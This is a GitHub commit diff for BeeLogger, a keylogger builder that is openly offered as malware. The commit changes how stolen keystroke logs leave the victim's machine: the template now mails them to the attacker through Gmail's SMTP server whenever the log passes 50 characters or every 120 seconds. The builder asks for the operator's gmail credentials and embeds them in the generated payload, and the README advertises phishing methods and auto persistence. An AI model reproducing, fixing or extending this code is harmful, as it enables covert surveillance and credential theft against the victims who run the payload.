Skip to content

Commit 319a8d7

Browse files
author
jinx
committed
Fail send logs Fixed
1 parent 0a8e7b4 commit 319a8d7

File tree

4 files changed

+17
-19
lines changed

4 files changed

+17
-19
lines changed

README.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -61,7 +61,7 @@ Taken from [LICENSE](LICENSE).
6161

6262
- Send logs each 120 seconds.
6363
- Send logs when chars > 50.
64-
- Send logs with CUSTOM SMTP EMAIL SERVER.
64+
- Send logs with GMAIL.
6565
- Some Phishing methods are included.
6666
- Multiple Session disabled.
6767
- Auto Persistence.
Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
2+
SERVER: 'smtp.gmail.com' PORT 587 *** RECOMMENDED *** - STATUS: Tested OK
3+
4+
SERVER: 'smtp.live.com' PORT: 587 - STATUS: Tested OK
5+
6+
SERVER: 'smtp.mail.yahoo.com' PORT: 465 - STATUS: Non Tested
7+
8+
SERVER: 'smtp.gmx.com' PORT: 25 - STATUS: Non Tested
9+
10+
Feel free to search yourself if your desired don't appears in this list and send it on github.com/4w4k3/BeeLogger if you want contribute with Bee.

Templates/Bee.py

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -41,8 +41,8 @@ def run(self):
4141
global data
4242
if len(data)>50:
4343
ts = datetime.datetime.now()
44-
SERVER = gh
45-
PORT = ghp
44+
SERVER = "smtp.gmail.com"
45+
PORT = 587
4646
USER = EEMAIL
4747
PASS = EPASS
4848
FROM = USER

bee.py

Lines changed: 4 additions & 16 deletions
Original file line numberDiff line numberDiff line change
@@ -14,23 +14,13 @@ def clear():
1414
os.system('clear')
1515
def begin():
1616
os.system('sudo rm -Rf dist')
17-
print "\n{0}You can see a list with servers and ports in SERVERS.txt on BeeLogger folder.{1}".format(GREEN,END)
18-
gh = raw_input('\nType email server (ex: \'smtp.gmail.com\'): ')
19-
# if len(gh) != 1 or 'smtp' not in gh:
20-
# print "\n{0} [!] Please use a valid smtp server.{1}".format(RED, END)
21-
# begin()
22-
ghp = raw_input('\nType email server port (ex: \'587\'): ')
23-
# if len(gh) != 1:
24-
# print "\n{0} [!] Please type a valid smtp server port.{1}".format(RED, END)
25-
# begin()
26-
email = raw_input('Type your email to receive logs: ')
27-
epass = raw_input('Type your email password: ')
17+
# TEMPORARY UNAVAILABLE # print "\n{0}You can see a list with servers and ports in SERVERS.txt on BeeLogger folder.{1}".format(GREEN,END)
18+
email = raw_input('Type your gmail to receive logs: ')
19+
epass = raw_input('Type your gmail password: ')
2820
print '\n'
2921
print '[ * * * * * * * * * * * * * * * * * * * * * * * * * ]'
3022
print '\n email: ' + email
3123
print ' password: ' + epass
32-
print ' smtp: ' + gh
33-
print ' port: ' + ghp
3424
print '\n[ * * * * * * * * * * * * * * * * * * * * * * * * * ]'
3525
print '\n'
3626
ask = raw_input('These info above are correct? (y/n) :')
@@ -42,8 +32,6 @@ def begin():
4232
o = template.read()
4333
payload = '#/usr/bin/python\n'
4434
payload += '# -*- coding: utf-8 -*-\n'
45-
payload += 'GH = ' + "'" + gh + "'" + '\n'
46-
payload += 'GHP = ' + "'" + ghp + "'" + '\n'
4735
payload += 'EEMAIL = ' + "'" + email + "'" + '\n'
4836
payload += 'EPASS = ' + "'" + epass + "'" + '\n'
4937
payload += str(o)
@@ -98,7 +86,7 @@ def main():
9886
raise SystemExit
9987
if choice.upper() == 'K':
10088
option()
101-
print '\n {0}WARNING: Enable access to less secure apps on your email account.{1} \n -> RECOMMENDED: \n* GMAIL * https://www.google.com/settings/security/lesssecureapps'.format(RED, END)
89+
print '\n {0}WARNING: Enable access to less secure apps on your email account.{2} \n -> * ONLY WORK WITH GMAIL * :\n {1}https://www.google.com/settings/security/lesssecureapps{2}'.format(RED, GREEN, END)
10290
print '\n NOTE: Don\'t use your personal email, make a dedicated.'
10391
print '\n {0}This keylogger send logs when logs > 50 chars or each 120 seconds.{1}'.format(BLUE, END)
10492
if choice.upper() == '6':

0 commit comments

Comments
 (0)